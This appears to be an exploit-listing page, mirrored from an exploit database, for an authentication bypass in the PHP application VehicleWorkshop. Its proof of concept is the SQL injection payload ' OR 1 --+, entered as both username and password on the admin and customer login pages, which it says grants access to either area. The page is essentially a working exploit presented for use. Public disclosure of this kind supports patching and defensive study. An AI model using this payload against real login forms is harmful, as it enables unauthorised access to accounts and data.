[] NeoSense
E X P L O I T S
title author type platform port cve id

VehicleWorkshop - Authentication Bypass

Author: Touhid M.Shaikh
type: webapps
platform: php
port: 
date_added: 2017-08-01 
date_updated: 2017-08-01 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comVehicleWorkshop-master.zip
[*] Type: Admin or Customer login bypass via SQL injection
[*] Author: Touhid M.Shaikh
[*] Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
[*] Mail: touhidshaikh22[at]gmail[dot]com
[*] More info: https://blog.touhidshaikh.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


===================== PoC ================

Admin Login Page : http://127.0.0.1/emplogin.php
Customer Login Page : http://127.0.0.1/login.php


Navigate admin login page or Customer Login Page and submit ' OR 1 --+ for
username and password




and it should give you access to the admin area or Customer Area.


Regards.
Touhid Shaikh
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.